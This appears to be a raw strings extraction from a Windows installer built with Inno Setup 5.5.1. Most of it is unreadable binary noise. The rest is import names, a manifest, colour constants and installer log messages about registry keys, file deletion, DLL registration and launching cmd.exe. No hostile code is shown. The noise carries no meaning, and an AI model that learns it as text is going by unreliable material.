"0& <',;
!#"$)()#!!
|~|121ssshhh
"*14<),3"$,'*2
"().CCGYZ]ikl_abIMLTVUZ\ZUXWKONCGG*0/;A=33<BG[
$."(4*.:
.1Y,'
$$$'''"""
$ #* #)#&-/29) 4
0%'6.0;#% ~
)*!35 9;3'("-.)
8;@ 11 209?>6;=-27$,1!(-
") 535?/1; .7$$0
%%'-),6*.834:68=
%%33///
# ,5#%.*/6$ 3!'.#' $(-"&
#(&*/#',
-#) ##%
".23"'%*/. .1$(-
%#%/(*4%'1"#-
'!$)$* "$*)(4/2:
===
# $'!%* %)
#"& *.5( 1.17/39
%*0"&,$*/
$% &(!"(
)))222 !
#$$)*#(*!%)$(-&*/' 0-16
#$ 0$*/*.3
"'$(- $)!%*&*/
;=3<>6$%
),/#(,%*, %'!&(',.$) "')
#% %(!&)).1.35
&.0#*,& -
!#&-/ 33-558<<.20587587266
%FIX{.6P
-#02*--(57004)
#$.wz
"$ %&,12!&'
""!&'#()279).1
'03-37)-1
%%,.$*,)00-45#((#'&376
#%"&* $*
"$)-/056,2359<)/0
!%"#% ,,$$'##'''*(( $$'''* *,/.0102.-/, - *,)(**) 435213*)
&(0,27#*0"'-
#%,13',-)./49;#))
),"460585' *&* #(
&( %( #'**/)),#$%
$$%:;<7<=
79/24*.0%.0&,.$,.$24*68.-0%$(
9Pi%9S9F[MSbY^dX_`?BC%&(
!)* ,./ %&
/1 -/(<>4>@6
5:.35./0,
#()/38#(-
/1'11,12,-/&/1'(* ,-")* ) !*,!&(
,0$<@4%)
R]pWbuP[oOZk<GV4@OMYh=HZIReIUb/:D-4>@CLYX_(&, *.CCF)) ""D7;;>669||
223::;#"#
"&/26'*/
"&%*."&(
%( '*"%(
,/&.0($&
.1(69/ 0%$(
$0(*235>
!$&&(**,103-,.YY[^]`778001 * 111222323213"!#
CFG@EF(-.AFGJOP',-',-',,
'*&%-0(02"*-
$(( /0.12,-.123/23-12)./3897;<-46)25 (-
$' ),$'*""%
', *0%-1(04# /
!$%"%&"%&
$)*389257 24(24
& ,167(,.-57 68
#$##'&$%&
11487:,*0
&-#)1!'/
"#"&'$***12*46
,"-1"(/
'(.LRW
//1, ,'
36.14,580-2*
",)/7"'-
"%'' ,/;9@ECK65;99<@@B>>@JKL* ,/020/4.-4, .DCE|{}[Z\(')XWX\]]---///666777888577<>@uy{RWY:?CAGNGMUKQWKPTEHNILPMPS<=C?;CKJRz
$. 0:).8
#$% './
'*"%( $'
-0(46.)-%,0(17.
$$%))), ,..."""#$$
")*4:&/7
&*'/2&.0(01*04
' (,"(,!)-#/3)/3)15 !%
%!'0"(2"'3
' !.2#16
%*).8 #105@
* %%%
"" 0)5:!,3
$)#)0"'0
* '.GOQz
' /$26 -1%6:. /#26 ' .1)682150
#,0*381:?%.2
/578<@168 $'
&*$/3'16
&,#-2'28#,2
.Cd$2J
)-"*.#(,!
(,!-1%*." 0$"%
&*.6=>7>@%,.
%)$.2*6;/;@'38".3
$" .)46 8;'6:$15
*.#59."&
#$-/4,.3026'*.
!% &( 0249;$) %'
$ & .)-/
!#/03 "%
59,;?4(-!
23-8:3-0'$(
%& 03/46699
-/024%')* .%&(
#) $))-0'-/
& .5;28@06?05<039-07(,3!$ 25>)-9
%#).#),(,.$&(
%)*)//*23'/1
/,7=/6@"*1
(,!<@5792%(
%$.35 &(#(*!$%
146 03!%(#(*
\\[343.0/
%),27"(*'*-#%(
!&$,/ (*
wZ^Whkey|u
' 48-59. /$,0&(-! 1 #*
&)*)-.(-/"'*
"##444'((
.27*.3(,1),146;25:(-206;08=08: ()
&(*14(/3
!'#)/&,2&,2(-3"(1
! %)*(./
"$ 35/7:"05
14(/3'' $)
%*#,1,-1.-0/
"#(-/ $&
BS~7Oy1O} Kx%Cj
14(.3&*.!/3&/3&&*
& :"'2#)0
$*.4' 0'*/,0536;,.3/16).3 ' !*- 48
" "'5 .@&);"&0
!"/56.67
). 0" &
"-.-.RQP,.0).3/5<.6@5AJ8FOy
)-1*.3"%,
!" 1 39&-6)06&-2
/5#6<*',
) ,*--"%%*0.6=:,21/47-1702;$)/
$&%***/.-
"#%)*') 1454==/99,671>>0>@
(," /(&)&;=;
!#057(-/"')
357#%',.1"$)
$&!&( %'
* 4<=/694<>189%,.&-/%,.
)#%**#'*/29-176<= $(
5GcO`xWe|>Oh.Ge`|
.1802;* 3#$
"##) & -"')
-1 37'6< $)
)')3&'0 %/
!24;/1:%&2%%-
!"(* "**
'&!*("()
""%)%(- #(
-/98)0.*1-,20% &
.1$.0%"&
*.% .).3'
212\\],./
16<&*1 $- $,
%()/139<*/2
"& #&$')#'(
$%$//&22*3629>3<@2<?)67/;; 33&..0785<<39:.55
"## %--
$/2! !('
$ ")-(01 ()
',-IRPr}~z
* "("%&6792130.097977;.2>
!" (*$,.
#& '( ') &
$-1&22&/.!(& #)%
)* ,-#$$
"$ (*!(*
!" 1#.0$,-$,,# ))0-(/)
%%,3'/5%.5
)# 2!,/'/1'./# *&- 2.'/&
-0369$&(
(-!( ()
(&'/ 3,$-$$'!"%
%( (,!14, "
3558;<!#%
87;15< .9
,39'.407=.5;06<07=&-3%,2
"(!(-").
!)$(2)*4)',#
)****)/..:9:%&)
'-#*0%,2%,2&.4!/4
!5(0?',8( 313?% ;
#*'(/,-513:62:6*2.
*),-/2'**##$
# $(3& ;
*0.,31-31,21% )
<:=267%)*##%
&%'-*-4#*3
!" %&"'(
"%*2!$0"%6
/.1277(./&( ,,/!
#)"(."(-
#(" 0!)/
&- '.%,2'-5
#)',20*0/(.-
4H$Ki%UxT
!"57:<7<=8<=167 02167267,./') '),'', #(#-5%/8
$#', 064
2250268<>8>>278,12,11 00*./-12&(
'&-5$-3'/6 28"*1
behKQQAIF=EDAIH&/.bijpwy{
*6o1FYHbu
:;<:<@7;>39;279-24%*,"')&*.,04$(-
%. /95.:6
35,570) *35915839;,12& ,#()#(*!&,
%#!&%'-,% *
&>.CUCVo
!".25 14& /.37/47'*/
*2$/7",2" 1
'0!)3&.8")5
(?-/=(')
#).9(.8#(
''4;>$,0
$%'-1#)1,2=
%-!/; 8L!D]%SnV
!*( 19:=(-,
)45.9<3=@ (0
5")9!"*!
OUR)/.FIRehtpv~tz
$$/2/*)'
...89:%'() .GMOQSV_^aRSW[]c?AF
QX^!(8%.C
%!%1$#- )
%%$* *687788***%$$
&.(,/#$&! #
(('010987
"1369;>/14:;>
%%;@@388
%( /2.:=<%((
#"6<;4:9)/.*10
$*.27D 1C",??L]{J[}Pa
'/.nvr
/43;@? %$
###**#**
$('032!$#
!-Wd}EZ{@\
‡CFFQPU`
/.-10 $""&$)-
- ).,*&$"
!%##'2)- %)'
%",30$ (
!(' 45'/1 (*"*,
#'$' )$(&$(&(,*
$)(-329>$/." *
"&%' *#'%
". '1!&0
-.3$$)337
#/#(6'*:( :
$"'*<>>.12*,30/;
&.,7>#27&15&/2
!6"&<!&=
"* &/2$.5&3=
"0-2<5:>5;;(-
!#!#&!$)!&,&,3 &/ 0;.3?!&1!&1
#.$(3!*5
!* &0"(2
"8"(> &=
#6' >'*< #3
!/!#0 #.
*(%>=:552-. !"
% $/)*1,/40,0.
$.$ 5)2;*3> 3@'/>
$ *$"*#(-)042*,,
#%$')%' &).& 0!(."(2$)1
,-,220!!
$(%)0-(. ,0.!$"
'-2!',!',$)/!&-"'. ',!(-
,,)==:''$663
$!(&%*(*.,-/-
$)&,0 &*#),',2 17#).
(,3*/8 '5! 9 '6
$&*/5/5; '-
' $/1289* *
''$((%%%"
""&(5:;9>@.340579=@7;@26;' /
#F&,L*/M"'D"*J%.S,6^4>lFP
$"!##!$%!$$!%%" (
#& #&!&(# #
.0*&)$#*'!). 5859<8
# & "'. %.
"$(36:'*.
''$%%"**&441==:;;9/0/&''&&'023 ./%()& ,
$$&('' )
")$$ %'-'&*.*-'
/*)*'‰6## ""
((%--*((%**&231* )'''"""$%%.21%(("&'
$03:ptzDGM@CJ^ahX[b57>--3*).HHKbaeeck^]gabnrt
%''.-*2"%,
$#"-)(1 )&"
*)(('& *(&-330)("
(*'.0,"&"
#- $.&'/22:44:$&.
(%.:%-9!'3"'4
$"%-%*/( .
#(.,1;,0=
$.).9*/9' 6$&.!#'$&)(-.
%*0(.3$ /
" (,*-1/
#%$).&$))*203>%(5
!)" 0!(0$*1*06!(."'/35;445456'
'*'-2"'/
*%(5 %0 &-
(*&;=9$&$
$' &)# #
%#-1/$(&
$)&.3$*0
#$ .0."&$
"%$153(,*(,
"%!),&-2%)3
LNP5;;:AF@JUDP_Tgy=Pb2;F
!"&%$('&.-,, *(''**(11/;:8>=;::8331
#&(03'/4-28
#("&%(-,
%"&1$ 5%.: (3
(( -<<9??=@@<861!
'*$),&"%
#!"&$$('(,)!&!
!*-# -!)
#=)9V%4U
!#!#%"'*'%(%,/*,0)
&"&0'(1(*.
!*-#,0!)-'/5$*3
!3#,= (7
-, -/') !!#
(9 ,9%0:
*-$.1)25-15*26-*,$')"$&
[]] $!)-,&,0
.3?75;0-/ #&
%3(2<")5
).#/1*'*""%
5!);5>N/Zh
%!$,-07 #*
(,",1$"%
*&':57 &%%!
#'-'*0-/6)-3
" #%#(,)
.1-01.''%
433><<- ,'#"
#$ 10..10/1343?@@>??(((
;8@/02!&&
%1;MYbtXbuM[s->[.Fb}
"***4!"
! #*)-3"&,"&,
),%-."))
# &.7)3>
8;024*), ,"35 >@613(
$&",2 7=",1068-24&(*
/, 2/.-)(;86%$!
!%!).*(/
:<2) ) !02(/1'>@6 -#
*'&63230-
%5?
7:/35 35 -#*,"9;1 #
!%*.2/13%')
03,3409:6350!#
"# <=9483
;Xo/9G0.1!%'$).JNSnrwUY\$-9O\q!&6
#!"%&&'"## #$
##!46026.36/9<8695685*.,
"(),-/2,14.27/4847>..5>>?
*-/;:;>>>?@?
<A?RXSAI@AICY_]3993985::AEH-24.46.23:?As}~
.3 8<.#%
-;!'1&$ && ,/3$',
&'$=>=;<7(*$231[_^
y{uTVPBD>:<6693>A:FJBGKBQUMW[RW[PQUJHLACG<59.TXO
!"!:;624.
..81,2104
ikeY[UKNG@B=BF?=A9@E;HNAQVJQVKLQFRVK:>304(QUL
U[h)&.KINIKO'(1
}tvpfhbprmce`AD=/3 /'CH<EL=BG;BE9HK?ORFJMB<@4@D8FJAOSL04.KOIy}x$)&
!%)*,"$&
"!#("$)#%*%(- -2*(/
-3 .8"08%%
#(%&*$%'*,/(*.15927<
!&$& %&
!%&'&)*)--
UYKln`9:*??.on[>>)baK
,40-5,6938;66949;7472$'"
-!-- ()
'2,*60#-(
!$&,'& $%(%'*,/2.27.38
&&'.)*1!")
%&(-*-1"#(
""$()rtvDFH' /7;A5:@6=C@FL:@A:?;04 -1$gk\PSC13#@@/on\;:þQ
$(!$& "%
"##* )./03 -0137.37059
$(*/*,146;&',
"))-447'(*
-!-/%/1'$)
"/&&.*!($
!&,459//1) -025')-
")"$ ,.5&'.
./%--# 0#3;.,2'
'!& ')-)
0/.522&$#2100/.EDD552--&!!
"#"%1/1><>301
('$553//-"" 10.DDA886
RTRTVTWYW^`^acagig_a_UWUprpqsqlnlrtrlnly{y
OQGssh53&12$6;*bhRGN6IO:
9;@.29,19#%,!$
88'57*%'
/.'10*&%
!-$,8$(2
&'#./*664
:=:(, "&55CCCA?@ *
7:2*.$#'
:97#''&())$%%)))331
)-,,1/*-*
"- .45:(*/&& ** 213,,,"##
!" !!899
24.PRL
*,&35/ -&
37,49/!%
!"'(*)* :<:
65.JGE862XWO!"
06*-2' $
38=7:95657:;148
250582:=6
(10"&&687
#%(57:) -
13!$$$$#
,. 793/2)
.'6:0"&
&'&%% %$
%,-*)*'!"
"$(/2$&(
, ),-'00* ,** (
%&(/2&(*
7;@0.2202&&&'(&,-*12/./,* (/0,235
&&)"$' "% "$
#) '.0) ,
- &11)!$
33688;669//2
) $.11:('-
- !" $$!!!
(( --0225,,/
*-%FHB-.*
#%##%#)*')*'* %##
""%//2!!$
12,23-!"
=>87:1.1)13-,-)786
" <",?!-=
#$'.0&,,/11''&01.CA>hf_
'/ /9%$$
&.,3:' 0
|}{}~|}~|
#*)7<"*0
./)34.AB<?A;'*$
}~|}~||~|
0431546:9;?>;?>;?=8<:376
! !"!"$#%
$#-107;:8<;9=<7;:6:9"&4
/..)))"""
)'21/**(
'%",*$, $77-64,84./-#,*
/3*36,7;-8: 24&,0&
01$12$./#$'
!%$ /.376486598478034
01%-.!/0!*,
#"& ).31/31154145
!'.BOUCQTHQQ $#
' !',!$(
"&& ...11.12),-
#% 24.682,-(01.#"#
*,! -"02'89.JK@<>257 34)/1&24)33( *
"$'* ./,/0
&BHQRU^cajtlu
&)$02 02,;>8,/'
'( -..)))$%#'(&'(%''!##
03/./)571=?9892 ,(
vu^jhTonY_`LUWEIL:>B115%CH718%
54$@@/==.?>1('
99.NOCmnb]^R*
-.#,,"&&
!#$#!#! !
1 !GC7QL@;7 CA6CA697,64)30%:9.JJASSIOOE01'
%0%Una
@A=TSL85053.LJDKIE')*
-. 56))*
9:.89-,-!"#
201 *.NPVQW]SX^/25
./"-."'(
#%&&()"$%9:<
*00.34,12
"#"#$!%%
32"68'23# !
"@@5-,!
!#&&'&&&$%#((#(* ')#
00!<=..0!
*."*, #&
!#%&&%&&&'%'(#') "
>??971;8-:;3793/3*,1#.1
44$12""$
.( / #.1(10(*%!
!"%%&$%$$%#&&"&'
=8,97.68114)03$@B.TS={wd
9:,01%'(
*(#)(" #
&! -'0 %6($4*%,.(
$$%"##!"!./*24
/1%-0$ ."(
)( -,%/ !-(
.("-'!'!
!" ()%) ##&
55D$!!
46)( *,!) ),
'' 76/50(1,")$
% .'#-"
')*8;; #"
-/! . ,/!,/!
33(45)'*
0 ".) -(
1(!-&!'%
/9>0:?&--
49,;?1/3%
14)15,"%
-' 0(#.("
#$!&'$$% 8;513,((
=;'42! )
LRQ)/.BHGNTSY_^cihlrqs|{|
%&%"#!$%"''%#%
% &.5%-5
&1 )1$1:
.2#-0%/1&
-( .&" #
&'&'(& !
%'! ! $%"()
:8':8&)'
-$!/&%-$%
(%%$! %"!$! *&% (&*'&0, 4114245131-0#!#..-
)* 022122234788577')(
'($$%!%&&67545
58-47/(*$
&""!$"!#
. *9462/1/.0- /&$([[\
.335969>::?;7<87;7596043
'--1634946;7384272052 /.
&/.7?>7=<
45(2-19/))*
*)%uslEG@
), '*)' )
!'&*.,-1/264152 /,%)'*/.
%-,%/.8?>"%$
67&:= 68(48)&*
. ,2)!%
,,$%$213/,/-
%$$('(,*(,*%)(#'%
-/-/10,/,,/)!#
TbhPQAgaHa^LBA3A?.MK9FD30.
,3-5:6!%#
"3 -5214103/0735624
787574472,/-
$&$&(&(*(%'%' (&)""#
'( 00#7:%
4129/-531:76401735
$&(&))#'&)-,)-,%)( /.,0/)-,
ehg ..EHGAED /.EHH
) *8;8<?=;>;:=8475
% *(**())&(( -- , ,-- -,
'**(/'-9)&1#
$!&' ((, -
.12.11#&'
"#!%&$%&$&&$"&"
"&")- 0-02 36%&3=_
WccKOBWVB^[AOM5NM8VUBPN=?=.FF7DD8AA3JJ<>>2
"$"$%##$"%&$&&$
,<3"0"*4'
(*/ :G-FS/DO.AK5O[LhvT_o. 6-) 644522866
'(%$%&$""!-1-[c^qrq&%(" 4_}
).1*50$.
;<=?666'&%
#',';G(BP.BM'9D%BPB`pFUe"!,'&'223-*/}|}
'&'%$%$%#$$"
'0" 5!*4&.8,1@$)9$*7!'4#'5
'( >??788$$%
}/0.KLGZZP^^TacYbe[]bVZ]TIIG\][
lmn03.WZTbe^z}t~
38*04($'" $#!%%
)BO(<P&:J!>N.OgF`s,5@)".!
#"$##$%%$%%#%&%!&"%%"
0"38, $
!*!)4",8
)58.GS0DU-@N DQ)FY=Vf&-9
)((''&%'$%%"''& %!""
"$231()(
92--)) ,**.())&$%$$($%
#,/5?#).'* 676
*0.Za^
#"1656:9!#"
( /22477/34 /0
44'23')
) (.0-"%"
%%"3"""
rnj---,- 110(*%FHDAAA
!%"!("! "$0
*,)3729<8),(584251473
687483363797
- 483463,.-
(2*6B?KZ@S_'=I$3B8CUODTiAPm/@^8Fd/:Y/8W#-L
)*)04/030
%)')- -1/!&$(*)
974LLLCDB02/&'Ýc
$&$-0 ,/
!#"&*$$
OK>~we><6#).CQ`v
3,.zv}
\_`022435
'.%S]R
=DK)05).3ACL6<K 5IQ]udp
%)%DGCNQM]`\RTQJNFGKC%(#
4<90723:5!*(
!$ÏGBEF\`_ptsZ^]LPO
!("&-/$*
,.,/1/131/2-.1
*,(;=8-1*
$&$&(&')'%(#
&(&"#"$%#$
#)#$*"%(!
#" "&$087"&'"#$
"$"575!#!
#%#')'&(&"$" " !
(-(*0(-0*
" 1 ,2* .'
*11%)*!"$
""!!0558;</29@Q]Tkx1@O)AS>]iRhp
4=<%* !"
%(# -'-0 /2.03.03-12 12)-.*,-*-.*,-*-,043376365/327;:9=<7;:&*)9=<
&*")-%)-&
"##!'&*10
'*& .(&)"' # /'-0)!$
) $&(""$
556]]]!!$
ELI6AGYblTYb'/.gle
!! $(&(2.3=8297%)(
''#.0,230241040.83*52 * &.2/58 ./#%
01.BEA 1,& ($)&8>:OURNRLKNHBE?KNHSVQZ]WX]SY^T[_WX\U\_Yjni^`]MPL:=9;?;9<8;>:7;7595351*-)/1-143-33,11 10*/.(--$/ &2,&0 &*&()&.. 7;0@D8@D8BF:BG;OSGSWLbf[gk`vyqz}vosiz~qz}q
%(( /.(/1!*." /#,2
$ $**.27:?!#
$& )/#07
#%%,,-.25(-/"((
"!,4//;4
!44.EM0LX
W_qX^^-1%SXLZd]hsoy
:;;$'%&,&
$"!)()0,
@CG34.GKF
*./ 12*12/584:?16<' 2!(*
#!,/*(-*$)*& ,-23.34 /0),,'(("""
& 8$)4$(-$'&
!! &%"(&!'&% *-. &(#!$
!*"'3 6 &
%$ '& &%$&$!#
y76.gf_
%),7--9#$,
#0-APPn}
#"&)*"''$)(
#$!&%),,#'%% ($*'
& )27>7
!,(.2#'&
#&!) '!$!
Kbz?Wo.DY
2 3729<
vNKA`cXeibabYik\nqffin_mq6<:.)#*,%Xeb1??
$%9$(0
//" * ",-#
" $1/#%'
%% $ '-%
"$"#$"###$%$
')$&(" "
#!''#'#(/&
&) .0'' ! #
63%!45% $
&-(#)%&-&"*#
.1),/'#&
.1)-.&$&
.0(-/' , 01%,-! ,
!!&*)/43
#=`d)::4/(A>.HO:46&$
!&$(-* %#
24-(*$')# #
25-892()!(*">@9!"
7/a' &
,/(')# #
('!. ''$
z57.SVL
%/'%*966
-/$)-/47#(* &'/66
690=@4;>0/1$
67.69.27'7;,
** ,,5@@
8;168.EG<HJ?BC8MMDBD@SZWgrp
NNFTP6FaiaB
.YdKA
qLCmd|D
lX%CP
0,.xP,`
3O?E%C
`.rdata
@.data
.pdata
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
KWindows
UrlMon
6MsgIDs
Msgs
pIPEdit
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryA
RegOpenKeyA
RegCreateKeyExA
SHFOLDER.dll
dll\shfolder.dbg
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s[%d]
%s_%d
.Owner
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
USER32.DLL
uxtheme.dll
DWMAPI.DLL
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
msctls_hotkey32
Items.ItemData
RegDeleteKeyExW
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ProgID: "%s"
oleacc.dll
MSFTEDIT.DLL
RICHED20.DLL
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
Rstrtmgr.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.1.ee2 (u)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
Expression error '%s'
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
%d.%d
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.1.ee2 (u)
Original Setup EXE:
